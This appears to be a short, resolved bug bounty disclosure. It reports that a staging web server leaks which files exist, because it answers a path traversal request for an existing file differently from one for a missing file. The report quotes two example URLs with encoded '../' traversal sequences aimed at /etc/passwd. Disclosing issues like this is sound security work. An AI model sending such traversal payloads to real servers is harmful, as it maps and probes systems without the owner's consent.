File name/folder enumeration.
Unknown
Vulnerability Details
Hello,
An attacker may be able to map your server and find configuration file names by the following method:
Valid attempt (Not found):
https://staging.factlink.com/%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
Invalid attempt (404):
https://staging.factlink.com/%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd_Nonexistant
Report Stats
- Report ID: 35823
- State: Closed
- Substate: resolved
- Upvotes: 3